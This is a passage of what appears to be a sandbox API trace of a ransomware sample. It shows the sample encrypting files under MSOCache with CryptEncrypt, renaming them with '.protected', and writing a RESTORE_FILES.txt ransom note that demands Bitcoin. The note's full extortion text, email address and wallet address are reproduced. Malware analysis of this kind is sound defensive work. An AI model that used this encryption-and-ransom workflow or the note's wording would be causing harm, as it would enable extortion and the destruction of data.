0x0 [0058.056] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0058.056] StrStrW (lpFirst="OnoteLR.cab", lpSrch=".rar") returned 0x0 [0058.056] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0058.056] StrStrW (lpFirst="OnoteLR.cab", lpSrch=".zip") returned 0x0 [0058.056] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.062] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.062] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.062] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.062] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.076] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.076] CloseHandle (hObject=0xb4) returned 1 [0058.076] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.protected") returned 88 [0058.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.protected")) returned 1 [0058.077] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.077] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0058.077] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0058.077] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0058.077] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0058.077] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0058.077] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.077] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0058.077] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0058.077] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.077] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.077] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.077] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.077] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0058.077] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.077] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0058.077] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.077] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0058.077] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x7c4, lpOverlapped=0x0) returned 1 [0058.088] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff83c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.088] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x7c4, lpOverlapped=0x0) returned 1 [0058.088] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.088] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.088] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.088] CloseHandle (hObject=0xb4) returned 1 [0058.088] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0058.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0058.089] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0058.089] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0058.089] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0058.089] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0058.090] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0058.090] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0058.090] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0058.090] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0058.090] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0058.090] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0058.090] CloseHandle (hObject=0xa4) returned 1 [0058.091] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0058.091] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0058.091] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0058.091] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0058.091] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0058.091] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0058.091] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C") returned 66 [0058.091] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0058.091] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0058.091] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*") returned 68 [0058.091] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0058.097] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.097] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.097] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.097] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.097] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.097] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.") returned 68 [0058.097] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.097] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0058.097] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0058.097] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.097] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.097] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.097] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.098] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.098] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.098] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.098] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.098] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.098] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\..") returned 69 [0058.098] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.098] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.098] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0058.098] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0058.098] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.098] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.098] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.098] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.098] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="Windows") returned -1 [0058.098] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="Program Files") returned 1 [0058.098] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="Program Files (x86)") returned 1 [0058.098] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="$Recycle.bin") returned 1 [0058.098] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="System Volume Information") returned -1 [0058.098] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0058.098] StrStrIW (lpFirst="ProjectMUI.msi", lpSrch=".protected") returned 0x0 [0058.098] lstrcmpW (lpString1="ProjectMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0058.098] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.098] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.098] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0058.488] StrStrW (lpFirst="ProjectMUI.msi", lpSrch=".txt") returned 0x0 [0058.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0058.488] StrStrW (lpFirst="ProjectMUI.msi", lpSrch=".rar") returned 0x0 [0058.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0058.488] StrStrW (lpFirst="ProjectMUI.msi", lpSrch=".zip") returned 0x0 [0058.488] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.490] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.490] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.490] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.490] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.491] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.491] CloseHandle (hObject=0xb4) returned 1 [0058.492] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.protected") returned 91 [0058.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.protected")) returned 1 [0058.492] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.492] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="Windows") returned -1 [0058.492] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="Program Files") returned 1 [0058.492] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="Program Files (x86)") returned 1 [0058.492] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="$Recycle.bin") returned 1 [0058.492] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="System Volume Information") returned -1 [0058.492] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0058.493] StrStrIW (lpFirst="ProjectMUI.xml", lpSrch=".protected") returned 0x0 [0058.493] lstrcmpW (lpString1="ProjectMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0058.493] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.493] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.493] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.493] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0058.493] StrStrW (lpFirst="ProjectMUI.xml", lpSrch=".txt") returned 0x0 [0058.493] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0058.493] StrStrW (lpFirst="ProjectMUI.xml", lpSrch=".rar") returned 0x0 [0058.493] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0058.493] StrStrW (lpFirst="ProjectMUI.xml", lpSrch=".zip") returned 0x0 [0058.494] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x5ac, lpOverlapped=0x0) returned 1 [0058.498] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.499] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x5ac, lpOverlapped=0x0) returned 1 [0058.499] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.499] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.499] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.499] CloseHandle (hObject=0xb4) returned 1 [0058.499] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.protected") returned 91 [0058.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.protected")) returned 1 [0058.500] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.500] lstrcmpiW (lpString1="ProjLR.cab", lpString2="Windows") returned -1 [0058.500] lstrcmpiW (lpString1="ProjLR.cab", lpString2="Program Files") returned 1 [0058.500] lstrcmpiW (lpString1="ProjLR.cab", lpString2="Program Files (x86)") returned 1 [0058.500] lstrcmpiW (lpString1="ProjLR.cab", lpString2="$Recycle.bin") returned 1 [0058.500] lstrcmpiW (lpString1="ProjLR.cab", lpString2="System Volume Information") returned -1 [0058.500] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0058.500] StrStrIW (lpFirst="ProjLR.cab", lpSrch=".protected") returned 0x0 [0058.500] lstrcmpW (lpString1="ProjLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0058.500] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.500] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.501] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.504] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 